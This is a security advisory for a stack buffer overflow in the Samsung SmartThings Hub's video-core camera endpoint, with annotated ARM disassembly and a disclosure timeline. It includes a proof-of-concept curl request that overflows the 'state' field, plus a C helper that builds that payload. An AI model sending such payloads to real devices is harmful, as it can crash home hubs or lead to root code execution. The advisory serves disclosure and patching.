CVE-2018-3905
An exploitable buffer overflow vulnerability exists in the camera “create” feature of `video-core`’s HTTP server of Samsung SmartThings Hub. The `video-core` process incorrectly extracts the “state” field from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker can send an HTTP request to trigger this vulnerability.
Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17
https://www.smartthings.com/products/smartthings-hub
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-120: Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)
Samsung produces a series of devices aimed at controlling and monitoring a home, such as wall switches, LED bulbs, thermostats and cameras. One of those is the Samsung SmartThings Hub, a central controller which allows an end user to use their smartphone to connect to their house remotely and operate other devices through it. The hub board uses several systems-on-chip. The firmware in question is executed by an i.MX 6 SoloLite processor (Cortex-A9), which has an ARMv7-A architecture.
The firmware is Linux-based, and runs a series of daemons that interface with nearby devices via Ethernet, ZigBee, Z-Wave and Bluetooth protocols. Additionally, the `hubCore` process is responsible for communicating with the remote SmartThings servers via a persistent TLS connection. These servers act as a bridge that allows for secure communication between the smartphone application and the hub. End users can simply install the SmartThings mobile application on their smartphone to control the hub remotely.
One of the features of the hub is that it connects to smart cameras, configures them and views their livestreams. For testing, we set up the Samsung SmartCam SNH-V6414BN on the hub. Once done, the smartphone application can display the livestream by connecting either to the remote SmartThings servers, or directly to the camera if the smartphone and the camera are on the same subnetwork.
Inside the hub, the livestream is handled by the `video-core` process, which uses `ffmpeg` to connect via RTSP to the smart camera on the same local network and, at the same time, provides a streamable link for the smartphone application.
The remote SmartThings servers can communicate with the `video-core` process by sending messages over the persistent TLS connection established by the `hubCore` process. These messages can encapsulate an HTTP request, which `hubCore` relays directly to the HTTP server exposed by `video-core`. The HTTP server listens on port 3000, bound to the localhost address, so a local connection is needed to perform this request.
We identified a vulnerable request that can be exploited to achieve code execution in the `video-core` process, which runs as root.
By sending a POST request for the “/cameras” path, it’s possible to add a new camera to the hub.
Such a request is handled by function `sub_48A14`:
.text:00048A14 sub_48A14
.text:00048A14
.text:00048A14 dest = -0x4364
.text:00048A14 var_4300= -0x4300
.text:00048A14 var_4200= -0x4200
.text:00048A14 var_4000= -0x4000
.text:00048A14 var_3E80= -0x3E80
.text:00048A14 var_3C80= -0x3C80
.text:00048A14 var_3A80= -0x3A80
.text:00048A14 var_2040= -0x2040
.text:00048A14 arg_0 = 4
.text:00048A14 buffer = 8
.text:00048A14 arg_8 = 0xC
.text:00048A14 arg_10 = 0x14
.text:00048A14
.text:00048A14 000 MOV R12, #:lower16:dword_C4DCC
.text:00048A18 000 STMFD SP!, {R4-R11,LR}
.text:00048A1C 024 MOVT R12, #:upper16:dword_C4DCC
.text:00048A20 024 ADD R11, SP, #0x20
.text:00048A24 024 SUB SP, SP, #0x4300
.text:00048A28 4324 MOV R5, R3
.text:00048A2C 4324 SUB SP, SP, #0x54
...
.text:00048A8C 4378 BL http_required_json_parameters ; [1]
.text:00048A90 4378 MOV R5, R0
.text:00048A94 4378 SUB R0, R11, #-var_4000
.text:00048A98 4378 MOV R1, R6
.text:00048A9C 4378 MOV R2, #0x2044
.text:00048AA0 4378 SUB R0, R0, #0xAC
.text:00048AA4 4378 BL memset
.text:00048AA8 4378 SUB R0, R11, #-var_4000
.text:00048AAC 4378 SUB R0, R0, #0xAC
.text:00048AB0 4378 BL clear_buffers
.text:00048AB4 4378 CMP R5, R6
.text:00048AB8 4378 BNE loc_48ADC
...
.text:00048ADC loc_48ADC
.text:00048ADC 000 MOV R0, R4
.text:00048AE0 000 BL json_tokener_parse ; [2]
.text:00048AE4 000 SUBS R5, R0, #0
.text:00048AE8 000 BEQ loc_48BEC
.text:00048AEC 000 SUB R0, R11, #-var_4000
.text:00048AF0 000 MOV R1, R5
.text:00048AF4 000 SUB R0, R0, #0xAC
.text:00048AF8 000 BL sub_48438 ; [3]
Note that the binary embeds the “json-c” library that is used to manage JSON objects.
The function initially calls `http_required_json_parameters` at [1] to verify that all the required parameters are specified in the JSON request. The parameters are: `cameraId`, `locationId`, `dni`, `url`.
At [2] the function parses the JSON payload received in the request using `json_tokener_parse`, which returns a `json_object`. It then calls `sub_48438` [3], passing the pointer to a local stack buffer and the `json_object` as parameters.
.text:00048438 sub_48438
.text:00048438
.text:00048438 000 STMFD SP!, {R4-R9,LR}
.text:0004843C 01C MOV R4, R1
.text:00048440 01C SUB SP, SP, #0x244
.text:00048444 260 MOV R1, #:lower16:aCameraid_1 ; "cameraId"
.text:00048448 260 MOV R6, R0
.text:0004844C 260 ADD R2, SP, #0x260+value
.text:00048450 260 MOV R0, R4 ; jso
.text:00048454 260 MOVT R1, #:upper16:aCameraid_1 ; "cameraId"
.text:00048458 260 BL json_object_object_get_ex ; [4]
.text:0004845C 260 CMP R0, #0
.text:00048460 260 BNE loc_48488
...
.text:000485AC 260 MOV R1, #:lower16:aLocationid_0 ; "locationId"
.text:000485B0 260 STR R7, [R6,#4]
.text:000485B4 260 MOVT R1, #:upper16:aLocationid_0 ; "locationId"
.text:000485B8 260 MOV R0, R4 ; jso
.text:000485BC 260 ADD R2, SP, #0x260+value
.text:000485C0 260 BL json_object_object_get_ex ; [4]
.text:000485C4 260 CMP R0, #0
.text:000485C8 260 BNE loc_48638
...
.text:000486FC 260 MOV R1, #:lower16:aDni ; "dni"
.text:00048700 260 STR R7, [R6,#0x208]
.text:00048704 260 MOVT R1, #:upper16:aDni ; "dni"
.text:00048708 260 MOV R0, R4 ; jso
.text:0004870C 260 ADD R2, SP, #0x260+value
.text:00048710 260 BL json_object_object_get_ex ; [4]
.text:00048714 260 CMP R0, #0
.text:00048718 260 BNE loc_48790
...
.text:00048850 260 MOV R1, #:lower16:aUrl_0 ; "url"
.text:00048854 260 STR R7, [R6,#0x40C]
.text:00048858 260 MOVT R1, #:upper16:aUrl_0 ; "url"
.text:0004885C 260 MOV R0, R4 ; jso
.text:00048860 260 ADD R2, SP, #0x260+value
.text:00048864 260 BL json_object_object_get_ex ; [4]
.text:00048868 260 CMP R0, #0
.text:0004886C 260 BNE loc_488DC
...
.text:00048938 260 MOV R1, #:lower16:aState ; "state"
.text:0004893C 260 STR R0, [R6,#0xE24]
.text:00048940 260 MOVT R1, #:upper16:aState ; "state"
.text:00048944 260 STRH R3, [R12,#0xC]
.text:00048948 260 MOV R0, R4 ; jso
.text:0004894C 260 STRB LR, [R6,#0xE2E]
.text:00048950 260 BL json_object_object_get_ex ; [4]
.text:00048954 260 CMP R0, #0
.text:00048958 260 BNE loc_489E0
...
.text:000489E0 loc_489E0
.text:000489E0 260 LDR R0, [SP,#0x260+value]
.text:000489E4 260 BL json_object_to_json_string ; [5]
.text:000489E8 260 MOV R7, R0
.text:000489EC 260 BL strlen ; [6]
.text:000489F0 260 MOV R4, R0
.text:000489F4 260 ADD R0, R6, #0x810
.text:000489F8 260 MOV R1, R7
.text:000489FC 260 MOV R2, R4
.text:00048A00 260 ADD R0, R0, #8
.text:00048A04 260 BL memcpy ; [7]
The purpose of this function is to extract each parameter and store it in the buffer passed as argument. Each parameter is extracted using the following sequence:
- Call to `json_object_object_get_ex` [4] and `json_object_to_json_string` [5] for extracting a parameter by key name.
- Copy the parameter value into a buffer on the stack, using `strlen` [6] and `memcpy` [7].
Additionally, before calling `memcpy`, the parameters “cameraId”, “locationId” and “dni” are verified using regular expressions, and the “url” parameter is simply truncated to a maximum length of 0x200.
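As a rough illustration of this kind of check, the C sketch below validates a value against an anchored POSIX extended regular expression. The actual expressions used by `video-core` are not shown in this advisory: `UUID_PATTERN`, `DNI_PATTERN` and `matches_pattern` are hypothetical, and the patterns are guessed only from the sample values in the proof of concept.

```c
#include <assert.h>
#include <regex.h>
#include <stddef.h>

/* Assumed patterns, inferred only from the sample values in the
 * proof of concept; the real expressions are not known. */
#define UUID_PATTERN \
    "^[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}$"
#define DNI_PATTERN "^[0-9A-Fa-f]{12}$"

/* Returns 1 if value matches the POSIX extended regex, 0 if it does
 * not, and -1 if the pattern itself fails to compile. */
int matches_pattern(const char *pattern, const char *value)
{
    regex_t re;
    int rc;

    assert(pattern != NULL && value != NULL);
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0)
        return -1;
    rc = regexec(&re, value, 0, NULL, 0);
    regfree(&re);
    return rc == 0;
}
```

An anchored pattern with fixed repetition counts also bounds the length of any accepted value, so a check of this shape limits the size of the later copy as a side effect.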
However, the “state” parameter is not sanitized in any way. In fact, we can see that the length value for the `memcpy` call [7] is set from the `strlen` [6] output of the source string itself. At a high level this would be:
memcpy(stack_buffer, state, strlen(state));
Since `state` is controlled by the user, there is no restriction on the length of the copy operation, which allows for overflowing the stack buffer and, potentially, arbitrary code execution.
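To make the difference concrete, the following C sketch contrasts the copy pattern described above with a length-checked variant. It is neither the vendor's code nor the vendor's patch: `STATE_FIELD_SIZE`, `copy_state_unbounded` and `copy_state_bounded` are hypothetical names, and the field size is an arbitrary value chosen for illustration, since the real one is not stated here.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical size, for illustration only. */
#define STATE_FIELD_SIZE 64

/* Mirrors the pattern at [6]/[7]: the length comes from the source
 * string, so nothing stops the copy from running past the end of dst.
 * Shown for comparison only; never call it with untrusted input. */
void copy_state_unbounded(char *dst, const char *src)
{
    memcpy(dst, src, strlen(src));
}

/* Bounded variant: copies at most dst_size - 1 bytes and always
 * NUL-terminates. Returns 1 if the input fit, 0 if it was truncated. */
int copy_state_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;
    int fits;

    assert(dst != NULL && src != NULL && dst_size > 0);
    len = strlen(src);
    fits = len < dst_size;
    if (!fits)
        len = dst_size - 1;
    memcpy(dst, src, len);
    dst[len] = '\0';
    return fits;
}
```

Whether an oversized value should be truncated, as is done for “url”, or rejected outright is a design choice; the return value lets the caller decide.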
We identified two different vectors that allow for exploiting this vulnerability:
- [...] `hubCore` that would be relayed without modification to the vulnerable `video-core` process.
- [...] `hubCore` process, and is allowed to make any localhost connection. It is thus possible for a SmartApp to send arbitrary HTTP requests directly to the vulnerable `video-core` process.
A third vector might exist, but we decided not to test it to avoid damaging any live infrastructure. This would consist of sending a malicious request from the SmartThings mobile application to the remote SmartThings servers. In turn, depending on the remote APIs available, the servers could relay the malicious payload back to the device via the persistent TLS connection. To use this vector, an attacker would need to own a valid OAuth bearer token, or the corresponding username and password pair to obtain it.
The following proof of concept shows how to crash the `video-core` process:
$ curl -X POST "http://127.0.0.1:3000/cameras" -d '{"cameraId":"00000000-0000-0000-0000-000000000000","locationId":"00000000-0000-0000-0000-000000000000","dni":"000000000000","url":"x","state":"'$(perl -e 'print "A"x700')'"}'
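For experimenting with different “state” lengths, the request body above can also be generated programmatically. The C sketch below rebuilds the same JSON with a configurable number of `A` characters; `build_camera_body` is a hypothetical helper written for this illustration and is not part of any SmartThings tooling.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Writes the proof-of-concept JSON body into out, with a "state" value
 * made of state_len 'A' characters. Returns the body length (excluding
 * the terminating NUL), or -1 if out is too small. */
int build_camera_body(char *out, size_t out_size, size_t state_len)
{
    static const char prefix[] =
        "{\"cameraId\":\"00000000-0000-0000-0000-000000000000\","
        "\"locationId\":\"00000000-0000-0000-0000-000000000000\","
        "\"dni\":\"000000000000\",\"url\":\"x\",\"state\":\"";
    static const char suffix[] = "\"}";
    const size_t prefix_len = sizeof prefix - 1;
    const size_t suffix_len = sizeof suffix - 1;

    assert(out != NULL);
    /* Need room for prefix + state + suffix + terminating NUL. */
    if (out_size <= prefix_len + suffix_len ||
        state_len > out_size - 1 - prefix_len - suffix_len)
        return -1;

    memcpy(out, prefix, prefix_len);
    memset(out + prefix_len, 'A', state_len);
    /* Copy the suffix together with its terminating NUL. */
    memcpy(out + prefix_len + state_len, suffix, suffix_len + 1);
    return (int)(prefix_len + state_len + suffix_len);
}
```

With `state_len` set to 700 the output matches the body sent by the `curl` command above. The result can be written to a file and passed to `curl` with `-d @file`.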
2018-04-16 - Vendor Disclosure
2018-05-23 - Discussion with vendor/review of timeline for disclosure
2018-07-17 - Vendor patched
2018-07-26 - Public Release
Discovered by Claudio Bozzato of Cisco Talos.